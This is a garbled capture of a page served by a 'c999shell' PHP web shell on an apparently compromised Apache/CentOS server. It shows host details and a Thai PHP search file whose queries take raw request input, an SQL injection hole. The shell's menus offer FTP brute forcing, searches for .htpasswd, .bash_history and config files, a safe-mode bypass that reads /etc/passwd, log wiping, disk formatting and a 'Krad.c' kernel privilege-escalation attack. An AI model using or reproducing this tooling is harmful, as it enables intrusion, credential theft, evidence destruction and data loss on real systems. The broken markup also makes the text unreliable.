Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     searchFormA.php (15.07 KB)      -rw-r--r--

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
				
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }
			
		/**  Searching */
		$keyword = $_REQUEST['keyword'];	
		
		//params
		$params = "Teacher_code=$Teacher_code&Budget_year=$Budget_year";
		
	} # else
 ?>












  

    

    execQuery($query);
		$rsBudget = $dbObj->fetchArray($result);
		
		/**  Query аѕЧиНЛТ Numrows ЎиН№  */
		if( $keyword != "" ) { 
			$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE Flag != '0' AND Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND (formaoffice.maNo LIKE '%$keyword%' OR formaoffice.Training_name LIKE '%$keyword%') GROUP BY formaoffice.maNo";
		}
		else {
			$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE formaoffice.Flag != '0' AND formaoffice.Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' GROUP BY formaoffice.maNo";
		}
		
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		//###  Search
		if( $keyword != "" ) { 
			if( isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE formaoffice.Flag != '0' AND formaoffice.Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND (formaoffice.maNo LIKE '%$keyword%' OR formaoffice.Training_name LIKE '%$keyword%') GROUP BY formaoffice.maNo ORDER BY $OrderBy $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE formaoffice.Flag != '0' AND formaoffice.Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND (formaoffice.maNo LIKE '%$keyword%' OR formaoffice.Training_name LIKE '%$keyword%') GROUP BY formaoffice.maNo ORDER BY $OrderBy $ASCDESC";
			}
		}
		else {
			if(isset($_GET['OrderBy'])){
				$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE Flag != '0' AND Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' GROUP BY formaoffice.maNo ORDER BY $OrderBy $ASCDESC";
			} 
			elseif(!isset($_GET['OrderBy'])) {
				$query = "SELECT * FROM formaoffice LEFT JOIN training_tb ON formaoffice.Training_code = training_tb.Training_code WHERE Flag != '0' AND Flag != '' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' AND formaoffice.Year_std = '".$rsBudget["Budget_year"]."' GROUP BY formaoffice.maNo ORDER BY $OrderBy $ASCDESC";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);		
    ?>
    

    
    

      

      

        
¤й№ЛТўйНБЩЕЎТГаґФ№·Т§д»ГТЄЎТГ
        
ЁУ№З№ўйНБЩЕµиНЛ№йТ 
          >5
          >10
          >20
          >50
          >100
        
      
      

        

          
          

            

              

                

                  

                    
Keyword: 
                      " />
                      
					  ">
					  ">
					
                    
 
                  
                  

                    

                  
                
              
            
          
           0 ) { ?>
          fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				
				$Teacher_code = $rs['Teacher_code'];

				if( $keyword != "" ) {
					$maNo = eregi_replace( $keyword, "\\0", $rs["maNo"]);
					$Training_name = eregi_replace( $keyword, "\\0", $rs["Training_name"]);
				}
				else {
					$maNo = $rs["maNo"];
					$Training_name = $rs["Training_name"];
				}
          ?>
            

            

              
No
              

                
                
                
                
                &OrderBy=&ASCDESC=&perpage=&">аЕўЛ№С§КЧН
              

                
                
                
                
                &OrderBy=&ASCDESC=&perpage=&">аГЧиН§·ХиўНН№ШБСµФаґФ№·Т§д»ГТЄЎТГ
              
ЗС№·Хид»ГТЄЎТГ
              
            

              

              

              
','','')">
              

              
            
          
           0 ) ?>
        

        

          

           0 ) { ?>
          

            

                

            
            

                
Page : 
                     1) {	
                            $previous = $display - 1;					
                    ?>&OrderBy=&ASCDESC=&">
bool(false)


:: Command execute ::
Enter:  
Select: 
-----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports 



:: Shadow's tricks :D  ::

  

    
Useful Commands 
    
    

      

        
        
          
            Kernel version
              Logged in users
                Last to connect
                  Suid bins
                    USER WITHOUT PASSWORD!
                    Write in /etc/?
                    Downloaders?
                    CPUINFO
                    Open ports
                    gcc installed?
					Format box (DANGEROUS)
                    WIPELOGS PT1 (If wget installed)
                    WIPELOGS PT2
                    WIPELOGS PT3
                    Kernel attack (Krad.c) PT1 (If wget installed)
                    Kernel attack (Krad.c) PT2 (L1)
                    Kernel attack (Krad.c) PT2 (L2)
                    Kernel attack (Krad.c) PT2 (L3)
                    Kernel attack (Krad.c) PT2 (L4)
                    Kernel attack (Krad.c) PT2 (L5)
                  
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  

   Kernel Info: 

      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  

   Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    
    




 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]



:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--